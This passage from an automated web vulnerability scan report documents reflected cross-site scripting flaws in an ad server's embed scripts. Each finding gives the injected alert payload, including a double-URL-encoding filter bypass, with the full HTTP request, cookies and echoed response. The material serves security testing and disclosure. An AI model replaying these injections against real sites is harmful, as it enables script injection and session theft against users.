Set-Cookie: i_1=33:353:22:3:0:34115:1296351680:B2|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; expires=Tue, 01-Mar-2011 01:41:20 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 880

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a36420'-alert(1)-'70de7b5bcbb';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7f
...[SNIP]...

5.101. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86ef8'-alert(1)-'03feb110922 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ86ef8'-alert(1)-'03feb110922&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:41:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:41:02 GMT; path=/
Set-Cookie: i_1=33:353:22:3:0:34115:1296351662:B2|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; expires=Tue, 01-Mar-2011 01:41:02 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 880

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ86ef8'-alert(1)-'03feb110922&ASID=b7e3b00f832b4ae1873eac83f051400a';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href
...[SNIP]...

5.102. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb2d8%2522%253balert%25281%2529%252f%252f41a552df8a3 was submitted in the REST URL parameter 2. This input was echoed as fb2d8";alert(1)//41a552df8a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357fb2d8%2522%253balert%25281%2529%252f%252f41a552df8a3/353.0.js.120x30/1296350847** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; c_1=33:967:555:0:0:36941:1294800536:L; o=1:1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 02:05:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1593

   function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6');
           try { axo.AllowScriptAccess = 'always';    }
           catch(e) {return '6,0,0';}
       } catch(e) {}
       try {
           retu
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357fb2d8";alert(1)//41a552df8a3/353.0.js.120x30/1296353113**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

5.103. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f66b8%2522%253balert%25281%2529%252f%252f63760bb090e was submitted in the REST URL parameter 3. This input was echoed as f66b8";alert(1)//63760bb090e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30f66b8%2522%253balert%25281%2529%252f%252f63760bb090e/1296350847** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; c_1=33:967:555:0:0:36941:1294800536:L; o=1:1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 02:05:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1593

   function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6');
           try { axo.AllowScriptAccess = 'always';    }
           catch(e) {return '6,0,0';}
       } catch(e) {}
       try {
           retu
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30f66b8";alert(1)//63760bb090e/1296353114**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

5.104. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2d70'-alert(1)-'deaf3db773 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488b2d70'-alert(1)-'deaf3db773&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:36 GMT; path=/
Set-Cookie: i_1=33:353:23:3:0:34115:1296351635:B2|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; expires=Tue, 01-Mar-2011 01:40:35 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 870

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488b2d70'-alert(1)-'deaf3db773&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       
...[SNIP]...

5.105. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e381c'-alert(1)-'e8f4f7459d2 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=Ge381c'-alert(1)-'e8f4f7459d2&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:22 GMT; path=/
Set-Cookie: i_1=33:353:812:3:0:34115:1296351622:B2|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; expires=Tue, 01-Mar-2011 01:40:22 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 875

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=Ge381c'-alert(1)-'e8f4f7459d2&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function
...[SNIP]...

5.106. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2902'-alert(1)-'1b81fa1f4a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a&c2902'-alert(1)-'1b81fa1f4a5=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:42:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:42:43 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:34115:1296351763:B2|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; expires=Tue, 01-Mar-2011 01:42:43 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 872

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a&c2902'-alert(1)-'1b81fa1f4a5=1';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d
...[SNIP]...

5.107. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b60a0'-alert(1)-'db9c19dffc0 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639b60a0'-alert(1)-'db9c19dffc0&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:09 GMT; path=/
Set-Cookie: i_1=33:353:22:3:0:34115:1296351609:B2|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:40:09 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 881

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639b60a0'-alert(1)-'db9c19dffc0&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       f
...[SNIP]...

5.108. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**

Issue detail

The value of the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db6f1'-alert(1)-'76b72a8b0c6 was submitted in the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!db6f1'-alert(1)-'76b72a8b0c6&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:00 GMT; path=/
Set-Cookie: i_1=33:353:812:3:0:34115:1296351600:B2|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:40:00 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 876

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!db6f1'-alert(1)-'76b72a8b0c6&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return
...[SNIP]...

5.109. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a3b0'-alert(1)-'e3b21ac569d was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=13946061254a3b0'-alert(1)-'e3b21ac569d&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:40:49 GMT; path=/
Set-Cookie: i_1=33:353:78:3:0:34115:1296351649:B2|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:40:49 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 872

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=13946061254a3b0'-alert(1)-'e3b21ac569d&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.writ
...[SNIP]...

5.110. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc491'-alert(1)-'2e6b8e0e1b9 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8dc491'-alert(1)-'2e6b8e0e1b9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:41:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:41:31 GMT; path=/
